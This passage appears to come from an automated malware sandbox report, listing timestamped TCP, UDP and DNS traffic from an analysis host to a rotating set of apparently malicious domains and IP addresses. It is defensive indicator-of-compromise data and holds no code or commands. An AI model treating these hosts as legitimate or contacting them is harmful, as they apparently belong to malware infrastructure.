                                                                                  Dec 4, 2024 17:12:36.189627886 CET8049737172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:36.189789057 CET8049737172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:36.501158953 CET8049737172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:36.501204014 CET8049737172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:36.501317024 CET4973780192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:36.502340078 CET8049737172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:36.502522945 CET4973780192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:37.577430964 CET4973780192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:38.599294901 CET4973880192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:38.723201036 CET8049738172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:38.723408937 CET4973880192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:38.726933956 CET4973880192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:38.850996017 CET8049738172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:39.110443115 CET8049738172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:39.110783100 CET8049738172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:39.110991001 CET4973880192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:39.111649990 CET4973880192.168.11.20172.67.180.246
                                                                                  Dec 4, 2024 17:12:39.235502005 CET8049738172.67.180.246192.168.11.20
                                                                                  Dec 4, 2024 17:12:44.489554882 CET4973980192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:44.837444067 CET8049739118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:44.837687016 CET4973980192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:44.841566086 CET4973980192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:45.189349890 CET8049739118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:45.190063953 CET8049739118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:45.190109968 CET8049739118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:45.190278053 CET4973980192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:46.356832981 CET4973980192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:47.374274015 CET4974080192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:47.712863922 CET8049740118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:47.713097095 CET4974080192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:47.716725111 CET4974080192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:48.055273056 CET8049740118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:48.055949926 CET8049740118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:48.055958986 CET8049740118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:48.056113958 CET4974080192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:49.231133938 CET4974080192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:50.248456001 CET4974180192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:50.595901012 CET8049741118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:50.596137047 CET4974180192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:50.603223085 CET4974180192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:50.603271961 CET4974180192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:50.950781107 CET8049741118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:50.950853109 CET8049741118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:50.950882912 CET8049741118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:50.951194048 CET8049741118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:50.952694893 CET8049741118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:50.952749968 CET8049741118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:50.952898026 CET4974180192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:52.105539083 CET4974180192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:53.121661901 CET4974280192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:53.468502998 CET8049742118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:53.468769073 CET4974280192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:53.473718882 CET4974280192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:53.820628881 CET8049742118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:53.821280003 CET8049742118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:53.821290016 CET8049742118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:53.821635962 CET4974280192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:53.822299004 CET4974280192.168.11.20118.107.250.103
                                                                                  Dec 4, 2024 17:12:54.169164896 CET8049742118.107.250.103192.168.11.20
                                                                                  Dec 4, 2024 17:12:59.124598980 CET4974380192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:12:59.310311079 CET8049743209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:12:59.310503006 CET4974380192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:12:59.314080000 CET4974380192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:12:59.499957085 CET8049743209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:12:59.505703926 CET8049743209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:12:59.505717039 CET8049743209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:12:59.505899906 CET4974380192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:00.822343111 CET4974380192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:01.838602066 CET4974480192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:02.024311066 CET8049744209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:02.024491072 CET4974480192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:02.028086901 CET4974480192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:02.214390993 CET8049744209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:02.220629930 CET8049744209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:02.220834017 CET8049744209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:02.220963001 CET4974480192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:03.540569067 CET4974480192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:04.556799889 CET4974580192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:04.742331982 CET8049745209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:04.742508888 CET4974580192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:04.746201992 CET4974580192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:04.746228933 CET4974580192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:04.746298075 CET4974580192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:04.931689024 CET8049745209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:04.932149887 CET8049745209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:04.932451963 CET8049745209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:04.939758062 CET8049745209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:04.939774036 CET8049745209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:04.939970016 CET4974580192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:06.258677959 CET4974580192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:07.274844885 CET4974680192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:07.460642099 CET8049746209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:07.461046934 CET4974680192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:07.463846922 CET4974680192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:07.649780035 CET8049746209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:07.656366110 CET8049746209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:07.656382084 CET8049746209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:07.656657934 CET4974680192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:07.657429934 CET4974680192.168.11.20209.74.77.109
                                                                                  Dec 4, 2024 17:13:07.843111992 CET8049746209.74.77.109192.168.11.20
                                                                                  Dec 4, 2024 17:13:12.904424906 CET4974780192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:13.028234959 CET8049747104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:13.028420925 CET4974780192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:13.032011032 CET4974780192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:13.155788898 CET8049747104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:13.506921053 CET8049747104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:13.506936073 CET8049747104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:13.507704020 CET8049747104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:13.507853031 CET4974780192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:13.508043051 CET4974780192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:14.538184881 CET4974780192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:15.554322004 CET4974880192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:15.677802086 CET8049748104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:15.678075075 CET4974880192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:15.682126045 CET4974880192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:15.805628061 CET8049748104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:16.190895081 CET8049748104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:16.191077948 CET8049748104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:16.191237926 CET4974880192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:16.191589117 CET8049748104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:16.191818953 CET4974880192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:17.193881989 CET4974880192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:18.211180925 CET4974980192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:18.335598946 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.335768938 CET4974980192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:18.342364073 CET4974980192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:18.342441082 CET4974980192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:18.466453075 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.466614962 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.466963053 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.467005014 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.467034101 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.467062950 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.797456980 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.797501087 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.797728062 CET4974980192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:18.798434019 CET8049749104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:18.798650026 CET4974980192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:19.850600958 CET4974980192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:20.865860939 CET4975080192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:20.989703894 CET8049750104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:20.989905119 CET4975080192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:20.992326975 CET4975080192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:21.116126060 CET8049750104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:21.473937035 CET8049750104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:21.473982096 CET8049750104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:21.474219084 CET4975080192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:21.474811077 CET8049750104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:13:21.475025892 CET4975080192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:21.476052999 CET4975080192.168.11.20104.21.27.59
                                                                                  Dec 4, 2024 17:13:21.599916935 CET8049750104.21.27.59192.168.11.20
                                                                                  Dec 4, 2024 17:14:54.399833918 CET4977580192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:14:54.524017096 CET8049775172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:14:54.524233103 CET4977580192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:14:54.526568890 CET4977580192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:14:54.650506973 CET8049775172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:14:55.640592098 CET8049775172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:14:55.640763044 CET8049775172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:14:55.640948057 CET4977580192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:14:55.641597986 CET4977580192.168.11.20172.67.187.114
                                                                                  Dec 4, 2024 17:14:55.765362024 CET8049775172.67.187.114192.168.11.20
                                                                                  Dec 4, 2024 17:15:08.842324018 CET4977680192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:09.028769970 CET804977666.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:09.029010057 CET4977680192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:09.032955885 CET4977680192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:09.239115000 CET804977666.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:09.239175081 CET804977666.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:09.239240885 CET804977666.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:09.239285946 CET804977666.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:09.239319086 CET804977666.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:09.239495993 CET4977680192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:10.544333935 CET4977680192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:11.560405970 CET4977780192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:11.763783932 CET804977766.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:11.764008045 CET4977780192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:11.767509937 CET4977780192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:11.996910095 CET804977766.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:12.005808115 CET804977766.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:12.005821943 CET804977766.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:12.005841017 CET804977766.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:12.005852938 CET804977766.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:12.006002903 CET4977780192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:12.006041050 CET804977766.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:12.006196022 CET4977780192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:13.278081894 CET4977780192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:14.294147968 CET4977880192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:14.484075069 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.484338999 CET4977880192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:14.488239050 CET4977880192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:14.488303900 CET4977880192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:14.675569057 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.676279068 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.676491976 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.702820063 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.702877998 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.703047991 CET4977880192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:14.703107119 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.703203917 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.703284025 CET804977866.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:14.703372002 CET4977880192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:14.703428984 CET4977880192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:15.996216059 CET4977880192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.012276888 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.205948114 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.206176043 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.208558083 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.411350965 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.411384106 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.411667109 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.411691904 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.411747932 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.411912918 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.422348022 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.422580957 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.422605991 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.422624111 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.422732115 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.422898054 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.432913065 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:17.433161020 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.433904886 CET4977980192.168.11.2066.29.132.194
                                                                                  Dec 4, 2024 17:15:17.620052099 CET804977966.29.132.194192.168.11.20
                                                                                  Dec 4, 2024 17:15:22.448715925 CET4978080192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:15:22.821163893 CET8049780202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:22.821373940 CET4978080192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:15:22.824903965 CET4978080192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:15:23.197060108 CET8049780202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:23.198362112 CET8049780202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:23.198371887 CET8049780202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:23.198379993 CET8049780202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:23.198652029 CET4978080192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:15:24.338112116 CET4978080192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:15:25.354259014 CET4978180192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:15:25.725619078 CET8049781202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:25.725805998 CET4978180192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:15:25.729345083 CET4978180192.168.11.20202.92.5.23
                                                                                  Dec 4, 2024 17:15:26.099991083 CET8049781202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:26.100743055 CET8049781202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:26.100760937 CET8049781202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:26.100774050 CET8049781202.92.5.23192.168.11.20
                                                                                  Dec 4, 2024 17:15:26.100914001 CET4978180192.168.11.20202.92.5.23

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 4, 2024 17:11:07.650695086 CET5584753192.168.11.201.1.1.1
                                                                                  Dec 4, 2024 17:11:07.785408974 CET53558471.1.1.1192.168.11.20
                                                                                  Dec 4, 2024 17:11:23.908773899 CET5285753192.168.11.201.1.1.1
                                                                                  Dec 4, 2024 17:11:24.920824051 CET5285753192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:11:25.045907021 CET53528579.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:11:25.185787916 CET53528571.1.1.1192.168.11.20
                                                                                  Dec 4, 2024 17:11:33.107455015 CET5271753192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:11:33.262715101 CET53527179.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:11:46.823256016 CET6265653192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:11:47.511481047 CET53626569.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:12:01.976227999 CET5108153192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:12:02.194847107 CET53510819.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:12:15.583862066 CET6271953192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:12:16.165565014 CET53627199.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:12:30.485754013 CET5336653192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:12:30.620985031 CET53533669.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:12:44.124156952 CET5649953192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:12:44.488358974 CET53564999.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:12:58.840061903 CET6505553192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:12:59.123431921 CET53650559.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:13:12.664118052 CET5298853192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:13:12.903084993 CET53529889.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:13:26.489193916 CET6383353192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:13:26.660473108 CET53638339.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:13:40.471247911 CET5093953192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:13:40.621615887 CET53509399.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:13:53.889421940 CET6495153192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:13:54.460865021 CET53649519.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:14:08.761217117 CET6287153192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:14:08.889544010 CET53628719.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:14:22.445811033 CET6272953192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:14:22.605808020 CET53627299.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:14:37.037178040 CET5654053192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:14:37.217858076 CET53565409.9.9.9192.168.11.20
                                                                                  Dec 4, 2024 17:15:00.655548096 CET5354353192.168.11.209.9.9.9
                                                                                  Dec 4, 2024 17:15:00.779630899 CET53535439.9.9.9192.168.11.20

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 4, 2024 17:11:07.650695086 CET192.168.11.201.1.1.10x8b06Standard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:23.908773899 CET192.168.11.201.1.1.10x22caStandard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:24.920824051 CET192.168.11.209.9.9.90x22caStandard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:33.107455015 CET192.168.11.209.9.9.90x24acStandard query (0)www.orbitoasis.onlineA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:46.823256016 CET192.168.11.209.9.9.90xd85eStandard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:01.976227999 CET192.168.11.209.9.9.90xa63Standard query (0)www.earbudsstore.shopA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:15.583862066 CET192.168.11.209.9.9.90x1e84Standard query (0)www.superiorfencing.netA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:30.485754013 CET192.168.11.209.9.9.90x68e2Standard query (0)www.beylikduzu616161.xyzA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:44.124156952 CET192.168.11.209.9.9.90xa018Standard query (0)www.zxyck.netA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:58.840061903 CET192.168.11.209.9.9.90x414bStandard query (0)www.dailyfuns.infoA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:12.664118052 CET192.168.11.209.9.9.90x775Standard query (0)www.mydreamdeal.clickA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:26.489193916 CET192.168.11.209.9.9.90x91dcStandard query (0)www.maitreyatoys.worldA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:40.471247911 CET192.168.11.209.9.9.90x1323Standard query (0)www.dating-apps-az-dn5.xyzA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:53.889421940 CET192.168.11.209.9.9.90x3fd2Standard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:14:08.761217117 CET192.168.11.209.9.9.90xccccStandard query (0)www.nieuws-july202541.sbsA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:14:22.445811033 CET192.168.11.209.9.9.90x6d63Standard query (0)www.wcq77.topA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:14:37.037178040 CET192.168.11.209.9.9.90x1198Standard query (0)www.oztalkshw.storeA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:15:00.655548096 CET192.168.11.209.9.9.90x7bfdStandard query (0)www.75178.clubA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 4, 2024 17:11:07.785408974 CET1.1.1.1192.168.11.200x8b06No error (0)www.zkdamdjj.shop172.67.187.114A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:07.785408974 CET1.1.1.1192.168.11.200x8b06No error (0)www.zkdamdjj.shop104.21.40.167A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:25.045907021 CET9.9.9.9192.168.11.200x22caName error (3)www.75178.clubnonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:25.185787916 CET1.1.1.1192.168.11.200x22caNo error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:25.185787916 CET1.1.1.1192.168.11.200x22caNo error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:25.185787916 CET1.1.1.1192.168.11.200x22caNo error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:33.262715101 CET9.9.9.9192.168.11.200x24acNo error (0)www.orbitoasis.onlineorbitoasis.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:33.262715101 CET9.9.9.9192.168.11.200x24acNo error (0)orbitoasis.online66.29.132.194A (IP address)IN (0x0001)false
